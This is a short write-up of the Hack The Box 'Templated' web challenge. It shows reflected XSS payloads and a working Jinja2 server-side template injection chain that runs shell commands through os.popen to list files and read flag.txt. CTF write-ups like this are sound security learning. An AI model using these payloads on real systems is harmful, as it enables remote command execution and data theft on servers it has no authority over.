Templated - Hack The Box Challenge

1 minute read

  1 minute read

templated htb

We start the web instance and when we access we will see the following interface:

templated htb 1

To begin, the message already tells us that the page is built with Flask / Jinja2.

I tried inspecting the item or using the network tab in dev tool, but found nothing.

So I will try to introduce routes in the url to see if something happens.

templated htb 2

I got a 404 error but notice what we entered as path in URL is getting rendered in the website. Let’s try out a few payloads for XSS.

XSS Vulnerability<script>alert("hi")</script>

templated htb 3

I got nothing.. but trying another payload

<img src=x onerror="alert('xss')">

templated htb 4

Server Side Template Injection (SSTI)

Well, with this we know the web is vulnerable to XSS payloads, but this did not lead us anywhere to obtain the flag.

So thinking that the challenge is called “Templated” and that Jinja2 is a web template engine for the Python.

Maybe it’s an SSTI (Server Side Template Injection) vulnerability.

Payload 1:{{46+46}}

Result: it give 92 as output.

templated htb 5

At the moment we found 2 vulnerabilities, SSTI and XSS (Reflected)

So helping me with this acticle Flask & Jinja2 SSTI

In python __mro__ or mro() allows us to go back up the tree of inherited objects in the current Python environment.

Saying that we can use the MRO function to display classes using the following payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

templated htb 6

This lists all the files and guess what we can see flag.txt. All we need to do now is to replace ls * with cat flag.txt.

So the payload will be:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}

Finally we have obtained the flag

templated htb 7